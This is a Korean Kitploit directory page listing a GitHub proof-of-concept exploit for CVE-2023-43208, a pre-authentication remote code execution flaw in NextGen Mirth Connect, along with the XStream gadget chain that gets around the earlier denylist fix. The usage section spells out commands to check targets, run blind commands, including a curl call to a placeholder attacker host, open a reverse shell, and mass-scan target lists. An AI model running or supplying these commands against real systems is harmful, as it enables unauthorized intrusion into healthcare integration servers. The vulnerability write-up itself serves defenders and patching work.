Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-43208 — CVE-2023-43208: Mirth Connect 사전 인증 RCE PoC | Kitploit
도구/GitHubGitHub/kyakei/cve-2023-43208
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubkyakei/cve-2023-43208

CVE-2023-43208

CVE-2023-43208: Mirth Connect 사전 인증 RCE PoC

저장소 보기
3116개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-43208 — Mirth Connect 비인증 RCE

NextGen Healthcare Mirth Connect < 4.4.1에서 XStream 역직렬화 우회를 통한 비인증 원격 코드 실행(Pre-authenticated Remote Code Execution) 취약점.

CVSS 9.8 (치명적) — CVE-2023-37679 패치 우회

개요

Mirth Connect는 Java XStream 라이브러리를 사용하여 /api/users 엔드포인트에서 인증 없이 XML 페이로드를 역직렬화합니다. 기존 수정(CVE-2023-37679)은 위험한 클래스의 차단 목록(denylist)을 도입했지만, Apache Commons Lang3의 EventBindingInvocationHandler와 Commons Collections4의 InvokerTransformer 체인을 결합하여 우회되었습니다.

Mirth Connect 4.4.1에서 차단 목록(denylist)을 허용 목록(allowlist)으로 전환하여 수정되었습니다.

요구 사항

root@kitploit:~
pip install requests

Python 3.10+ (match 문 사용).

사용법

대상이 취약한지 확인

root@kitploit:~
python3 exploit.py check -t https://target:8443

명령 실행 (블라인드 RCE — 출력 없음)

root@kitploit:~
python3 exploit.py exec -t https://target:8443 -c "id"
python3 exploit.py exec -t https://target:8443 -c "curl http://attacker/pwned"

리버스 셸 실행

root@kitploit:~
# Terminal 1 (or let the script handle the listener):
python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

# For better shell experience, use rlwrap:
rlwrap python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

여러 대상 스캔

root@kitploit:~
python3 exploit.py scan -f targets.txt -o vulnerable.txt -T 30

공격 체인

root@kitploit:~
POST /api/users  (no auth)
     │
     ▼
XStream deserializes XML payload
     │
     ▼
sorted-set triggers Comparable.compareTo()
     │
     ▼
dynamic-proxy → EventBindingInvocationHandler (bypasses denylist)
     │
     ▼
ChainedTransformer.transform()
     │
     ▼
ConstantTransformer(Runtime.class)
  → InvokerTransformer("getRuntime")
    → InvokerTransformer("invoke")
      → InvokerTransformer("exec", <command>)
           │
           ▼
      OS command execution as Mirth Connect service user

면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 테스트 전에 반드시 적절한 승인을 받으십시오.

참고 자료

  • NVD — CVE-2023-43208
  • Horizon3.ai — Writeup
  • CISA KEV 카탈로그
도구 다운로드